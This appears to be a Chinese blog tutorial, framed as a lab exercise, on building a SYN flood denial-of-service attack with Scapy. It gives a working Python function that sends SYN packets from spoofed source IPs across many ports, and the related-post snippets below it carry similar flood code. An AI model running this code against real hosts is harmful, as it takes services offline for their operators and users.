Scapy实现SYN泛洪攻击

最新推荐文章于 2024-07-09 22:07:35 发布
最新推荐文章于 2024-07-09 22:07:35 发布
阅读量4.4k 收藏 10
点赞数
分类专栏: 网络及网络安全 python

一、实验说明

1.实验介绍

本次实验将使用python3版本的Scapy--Scapy3k来实现一个简单的DDos,本次实验分为两节,本节将学习如何使用Scapy3k来实现SYN泛洪攻击。

2.知识点

  1. SYN泛洪攻击的实现原理
  2. Scapy3k的基本用法

3.效果图

此处输入图片的描述

二、基础知识

以下部分内容整理自百度百科、360百科和Scapy3k官方文档:

1.SYN泛洪攻击

SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的Tcp连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。

我们都知道建立Tcp连接需要完成三次握手。正常情况下客户端首先向服务端发送SYN报文,随后服务端回以SYN+ACK报文到达客户端,最后客户端向服务端发送ACK报文完成三次握手。

正常TCP连接

SYN泛洪攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文。由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,当然如果超过一定的时间内没有接收到客户端的报文,本次连接在协议栈中存储的数据将会被丢弃。攻击者如果利用这段时间发送大量的连接请求,全部挂起在半连接状态。这样将不断消耗服务器资源,直到拒绝服务

SYN Flood

2.Scapy3k基本用法

Scapy3k其实就是Scapy的Python3版本,以下我就简称ScapyScapy是一个强大的交互式数据包处理程序。可用来发送、嗅探、解析和伪造网络数据包。在网络攻击和渗透测试中应用非常广泛。Scapy是一个独立的程序同时还可以作为Python的第三方库使用。是不是有些迫不及待的想见识一下Scapy的强大之处了?

我们先在实验环境中安装Scapy3k:

sudo pip3 install scapy-python3

此处输入图片的描述

现在运行scapy学习一下它的使用方法。

sudo scapy

这里需要注意:Scapy发送数据包需要root权限,所以这里我们加上了sudo。另外运行的时候会出现一些警告信息,我们这次实验没有用到相关的功能可以不用管,需要用的安装相应的依赖包就可以了。

此处输入图片的描述

现在我们用Scapy构造一个简单的数据包看一下:

pkt = IP(dst="192.168.0.100")

此处输入图片的描述

可以看到Scapy构造一个数据包非常简单,我们再来看一下如何构造SYN数据包:

IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")

我们构造了一个IP包和TCP包并将它们组合到一块,这样就有了一个完整的TCP数据包,否则是无法发送出去的。IP包中我们指定了源地址src和目的地址dst,其中src是我们伪造的地址,当然这也是DoS攻击中保护攻击者的一种方式。flags的值我们设定为S,说明我们要发送的是SYN数据包。非常简短的一段指令就够造了一个伪造了源IP地址的SYN数据包,是不是很简单?

构造了我们想要的数据包,现在我们把它发送出去:

pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S") send(pkt)

此处输入图片的描述

至此我们编写SYN泛洪攻击的基本知识就已经全部介绍完了,用这些知识足够我们来完成本次试验了。至于Scapy的更详细用法,可以看一下官方文档,你就会发现Scapy的强大之处。

三、代码实现

现在我们要用Python以第三方库的形式使用Scapy,使用方法和用交互式Shell的方式一样,注意:使用前要先导Scapy的包:

from scapy.all import

之前我们已经构造过了SYN数据包,现在我们需要实现随机伪造源IP地址、以及以不同的源端口向目标主机发送SYN数据包:

import random
from scapy.all import *

def synFlood(tgt,dPort): srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet)

在代码中我定义了srcList用于存放伪造的IP地址,之后定义了一个循环,作用是每次发送数据包源端口都改变,可以看到在构造TCP数据包的时候我们增加了一个参数sport,循环中改变的端口号就是给了sport这个参数。我们还调用random.randrange()函数来随机从srcList中获取一个伪造的IP地址。

至此我们本次实验就完成了,虽然代码非常少不过功能我们却实现的比较理想,这主要是因为Python的语法本身非常简洁,再加上Scapy封装的也非常好,才会让我们写出即简洁功能又强大的代码。

chenyulancn
关注
专栏目录
syn 攻击脚本 python_Scapy实现SYN泛洪攻击
weixin_39705065的博客
11-29 556
一、实验说明1.实验介绍本次实验将使用python3版本的Scapy--Scapy3k来实现一个简单的DDos,本次实验分为两节,本节将学习如何使用Scapy3k来实现SYN泛洪攻击。2.知识点SYN泛洪攻击实现原理Scapy3k的基本用法3.效果图二、基础知识以下部分内容整理自百度百科、360百科和Scapy3k官方文档:1.SYN泛洪攻击SYN泛洪攻击(SYN Flood)是一种比较常用的D...
python攻击网站的方式_Python项目 基于Scapy实现SYN泛洪攻击的方法
weixin_39918043的博客
11-24 537
python3版本的Scapy--Scapy3k来实现一个简单的DDos。首先实现SYN泛洪攻击SYN Flood,是一直常用的DOS方式之一,通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽的攻击方式)。TCP三次握手的过程在这里就不再赘述,SYN攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果...
python scapy实现泛洪(flood)攻击
最新发布
2301_80419020的博客
07-09 285
python scapy泛洪攻击
SYN攻击实现
markman101---神即是道 道法自然 如来
05-17 4958
SYN攻击 xxx.xx.xxx.xxx机器上用netstat –n –p tcp命令查看,可以发现很多SYN_RECEIVED连接。 而且都是发生在80端口上,而且无法正常访问80端口上的服务。其他的网络连接、服务都是 正常的。正常情况下不应该出现大量SYN_RECEIVED状态的TCP连接。例外这些连接的来源地址 都是有一定的规律。根据经验可以确定是有恶意者对xxx.xx.xxx.
HackTools————9、使用Scapy构造SYN泛洪攻击
Fly_鹏程万里
04-06 1065
使用Scapy实现SYN泛洪攻击其实很简单。我们只需要制造一些载有TCP协议层的IP数据包,让这些包里面的TCP源端口不断自增一就好,而目的的TCP端口总是为513源代码如下:#encoding:utf-8 from scapy.all import * def synFlood(src,tgt): for sport in range(1024,65535): IPlay...
Scapy:快速syn洪水攻击(syn flood)
m0_71713477的博客
01-05 1052
利用scapy的特性提升进行syn洪水攻击(syn floor)的速度
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
syn 攻击脚本 python_Python Scapy实现SYN Flood攻击
weixin_39731845的博客
11-29 276
SYN Flood的python实现代码如下。需要事先安装scapy库。(是scapy 不是scrapy)from scapy.all import *import randomfrom scapy.layers.inet import TCP, IPimport socket,threadingdst=""dport=0class flood_SYN(threading.Thread):glob...
测试syn-flood等泛洪攻击的小软件
10-26
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。
SYN flood攻击
11-05
syn攻击,使用winpcap编写,使用前请先配置vs2010
synFlood.py
08-25
中国秦川联盟SYN泛洪攻击Python脚本,使用第三方库Scapy,支持多线程攻击
Python黑帽子编程—Scapy实现SYN泛洪攻击(SYN Flood)
CSN-001的博客
11-29 2581
Scapy实现SYN泛洪攻击 1、原理介绍 SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。 我们都知道建立TCP连接需要完成三次握手。正常情况下客户端首先向服务端发送SYN报文,随后服务端回以SYN+ACK报文到达客户端,最后客户端向服务端发送ACK报文完成三次握手。 而SYN泛洪攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文。由于服务器在处理TCP请求时,会在协议
[笔记]使用Python的scapy实现SYN洪水攻击
qq_61690448的博客
12-22 2562
[笔记]实现SYN泛洪攻击
使用Scapy制造SYN洪泛攻击
zwlww1的博客
01-17 1606
#!/usr/bin/python #coding=utf-8 from scapy.all import * import optparse def synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt
python可以攻击服务器吗_使用Python scapy实现syn flood攻击 - Python - 服务器之家
weixin_39628864的博客
11-24 253
scapy是一个强大的交互式(interactive)的包操作程序,用python写的,有一个python的命令行解释器界面,可直接运行,也也可以作为第三库,在python程序中import来使用它的类和方法。支持对广泛的网络协议解码和生成,进行数据包发送、捕获、请求匹配应答等,可以用来生成指定内容的网络数据包的工具官方文档:http://www.secdev.org/projects/scap...
SYN Flood攻击实验流程
热门推荐
The__Apollo的博客
04-10 1万+
TCP SYN Flood,又称SYN洪泛攻击,是目前最为有效和流行的一种拒绝服务攻击形式。它利用TCP三次握手协议的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而不能正常为用户提供服务。 首先,令A为攻击机(SYN Flood攻击发起者),C为靶机,B为C要去连接的服务器,先查看它们的IP地址,如下: 然后,我们先用C连接一下B的23端口: 可以看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值